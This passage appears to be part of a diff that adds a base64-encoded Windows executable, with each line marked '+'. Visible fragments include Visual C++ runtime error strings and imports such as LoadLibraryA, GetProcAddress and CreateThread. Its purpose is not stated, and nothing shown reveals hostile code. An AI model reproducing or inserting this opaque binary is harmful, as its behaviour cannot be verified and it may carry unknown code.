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 +JGYAADpmAADoZgAA/mYAABRnAAAqZwAANmcAAEpnAABWZwAAAmYAANZmAADAZgAA/mcAAMpnAADW +ZwAA5GcAAPBnAAD0ZQAAEmgAACRoAAAyaAAAQGgAAE5oAABcaAAAbGgAAH5oAACOaAAAnGgAAK5o +AADKaAAA5GgAAP5oAAAUaQAALGkAAEZpAABSaQAAXmkAAHJpAACIaQAAmmkAAKxpAAC+aQAAymkA +ANRpAADgaQAA8GkAAABqAAAAAAAA/////wcdQAAbHUAABgAABgABAAAQAAMGAAYCEARFRUUFBQUF +BTUwAFAAAAAAICg4UFgHCAA3MDBXUAcAACAgCAAAAAAIYGhgYGBgAABwcHh4eHgIBwgAAAcACAgI +AAAIAAgABwgAAAAoAG4AdQBsAGwAKQAAAAAAKG51bGwpAABydW50aW1lIGVycm9yIAAADQoAAFRM +T1NTIGVycm9yDQoAAABTSU5HIGVycm9yDQoAAAAARE9NQUlOIGVycm9yDQoAAFI2MDI4DQotIHVu +YWJsZSB0byBpbml0aWFsaXplIGhlYXANCgAAAABSNjAyNw0KLSBub3QgZW5vdWdoIHNwYWNlIGZv +ciBsb3dpbyBpbml0aWFsaXphdGlvbg0KAAAAAFI2MDI2DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9y +IHN0ZGlvIGluaXRpYWxpemF0aW9uDQoAAAAAUjYwMjUNCi0gcHVyZSB2aXJ0dWFsIGZ1bmN0aW9u +IGNhbGwNCgAAAFI2MDI0DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIF9vbmV4aXQvYXRleGl0IHRh +YmxlDQoAAAAAUjYwMTkNCi0gdW5hYmxlIHRvIG9wZW4gY29uc29sZSBkZXZpY2UNCgAAAABSNjAx +OA0KLSB1bmV4cGVjdGVkIGhlYXAgZXJyb3INCgAAAABSNjAxNw0KLSB1bmV4cGVjdGVkIG11bHRp +dGhyZWFkIGxvY2sgZXJyb3INCgAAAABSNjAxNg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciB0aHJl +YWQgZGF0YQ0KAA0KYWJub3JtYWwgcHJvZ3JhbSB0ZXJtaW5hdGlvbg0KAAAAAFI2MDA5DQotIG5v +dCBlbm91Z2ggc3BhY2UgZm9yIGVudmlyb25tZW50DQoAUjYwMDgNCi0gbm90IGVub3VnaCBzcGFj +ZSBmb3IgYXJndW1lbnRzDQoAAABSNjAwMg0KLSBmbG9hdGluZyBwb2ludCBub3QgbG9hZGVkDQoA +AAAATWljcm9zb2Z0IFZpc3VhbCBDKysgUnVudGltZSBMaWJyYXJ5AAAAAAoKAABSdW50aW1lIEVy +cm9yIQoKUHJvZ3JhbTogAAAALi4uADxwcm9ncmFtIG5hbWUgdW5rbm93bj4AAAAAAAAAAAAA//// +/+tMQADvTEAAR2V0TGFzdEFjdGl2ZVBvcHVwAABHZXRBY3RpdmVXaW5kb3cATWVzc2FnZUJveEEA +dXNlcjMyLmRsbAAA/////79WQADDVkAA/////3NXQAB3V0AAFGUAAAAAAAAAAAAAamcAABBgAAAE +ZQAAAAAAAAAAAAC8ZwAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqGcAAJBnAAB4ZwAAAAAAABRm +AABKZgAAWmYAAGpmAAB4ZgAAhmYAAJpmAACqZgAAJGYAADpmAADoZgAA/mYAABRnAAAqZwAANmcA +AEpnAABWZwAAAmYAANZmAADAZgAA/mcAAMpnAADWZwAA5GcAAPBnAAD0ZQAAEmgAACRoAAAyaAAA +QGgAAE5oAABcaAAAbGgAAH5oAACOaAAAnGgAAK5oAADKaAAA5GgAAP5oAAAUaQAALGkAAEZpAABS +aQAAXmkAAHJpAACIaQAAmmkAAKxpAAC+aQAAymkAANRpAADgaQAA8GkAAABqAAAAAAAAwwBGcmVl +TGlicmFyeQBTAUdldFByb2NBZGRyZXNzAADfAUxvYWRMaWJyYXJ5QQAA/QJXYWl0Rm9yU2luZ2xl +T2JqZWN0AE0AQ3JlYXRlVGhyZWFkAAA0AENyZWF0ZUV2ZW50QQAALQFHZXRMYXN0RXJyb3IAABEC 